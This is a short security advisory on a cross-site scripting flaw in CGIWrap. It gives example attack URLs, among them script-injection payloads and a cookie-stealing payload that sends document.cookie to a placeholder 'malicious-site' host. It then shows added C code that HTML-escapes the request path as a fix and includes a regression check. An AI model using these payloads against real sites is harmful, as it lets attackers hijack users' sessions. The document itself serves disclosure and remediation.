CGIWrap Cross-Site Scripting Vulnerability
"TAKAGI, Hiromitsu" <takagi@etl.go.jp> provided these examples:

Confirming the bug:

http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

JavaScript code will be executed:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

Stealing your Cookies issued by www.example.org, if any:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
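
The URLs above work because the request path is echoed into an HTML response without encoding. The following is an added example, not CGIWrap's own code, of escaping the path before it is written into a page; the function names `html_escape` and `render_error` and the error message text are hypothetical, and the path is assumed to arrive already percent-decoded by the web server.

```c
#include <stdio.h>
#include <string.h>

/* HTML-escape src into dst (dstlen bytes). Returns the escaped length,
 * or -1 if dst is too small; dst is then emptied so that a truncated
 * entity or half-escaped string is never emitted. */
int html_escape(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= dstlen) { dst[0] = '\0'; return -1; }
        if (rep) memcpy(dst + o, rep, n); else dst[o] = *src;
        o += n;
    }
    dst[o] = '\0';
    return (int)o;
}

/* Hypothetical error-page writer (name and message text are assumptions).
 * path_info is the request path as already percent-decoded by the web server. */
int render_error(const char *path_info, char *out, size_t outlen)
{
    char safe[1024];
    if (html_escape(path_info, safe, sizeof safe) < 0)
        strcpy(safe, "(request path too long)");
    int n = snprintf(out, outlen, "<P>Request failed for: <TT>%s</TT></P>\n", safe);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

int main(void)
{
    /* Path components taken from the URLs listed above. */
    const char *paths[] = { "<S>", "~nneul/<S>TEST</S>",
        "~nneul/<SCRIPT>alert(document.domain)</SCRIPT>",
        "<IMG SRC=javascript:alert(document.domain)>" };
    char page[2048];
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        if (render_error(paths[i], page, sizeof page) > 0)
            fputs(page, stdout);
    return 0;
}
```

With the path escaped, the `<S>TEST</S>` confirmation URL renders as literal text instead of struck-through text, which makes it a quick regression check for the fix.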